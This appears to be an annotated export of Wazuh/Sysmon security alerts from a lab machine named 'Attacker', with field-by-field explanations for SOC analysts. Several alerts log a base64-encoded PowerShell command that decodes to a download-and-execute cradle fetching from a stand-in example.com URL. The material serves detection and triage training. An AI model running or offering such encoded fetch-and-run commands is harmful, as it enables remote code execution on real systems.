Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  44
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534228.1272833
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:51.7105256Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283231
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:51.697 ProcessGuid: {94294ddc-bd02-680a-0b0b-000000000e00} ProcessId: 10808 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_is1i0e3l.l1c.ps1 CreationUtcTime: 2025-04-24 22:36:51.697 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:51.697
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd02-680a-0b0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10808
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_is1i0e3l.l1c.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:51.697
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:09.064+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:09.064+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  41
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534229.1275602
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:53.8027624Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283265
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:52.626 ProcessGuid: {94294ddc-bd04-680a-0f0b-000000000e00} ProcessId: 13712 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd02-680a-0b0b-000000000e00} ParentProcessId: 10808 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:52.626
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd04-680a-0f0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd02-680a-0b0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  10808
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:09.079+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:09.079+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  45
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534229.1283673
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:54.0658636Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283266
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:54.027 ProcessGuid: {94294ddc-bd04-680a-0f0b-000000000e00} ProcessId: 13712 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_tav0px12.umw.ps1 CreationUtcTime: 2025-04-24 22:36:54.027 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:54.027
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd04-680a-0f0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_tav0px12.umw.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:54.027
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:09.591+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:09.591+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  42
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534229.1286442
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:57.6945948Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283300
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:55.050 ProcessGuid: {94294ddc-bd07-680a-160b-000000000e00} ProcessId: 5848 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd04-680a-0f0b-000000000e00} ParentProcessId: 13712 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:55.050
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd07-680a-160b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  5848
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd04-680a-0f0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:09.607+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:09.607+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
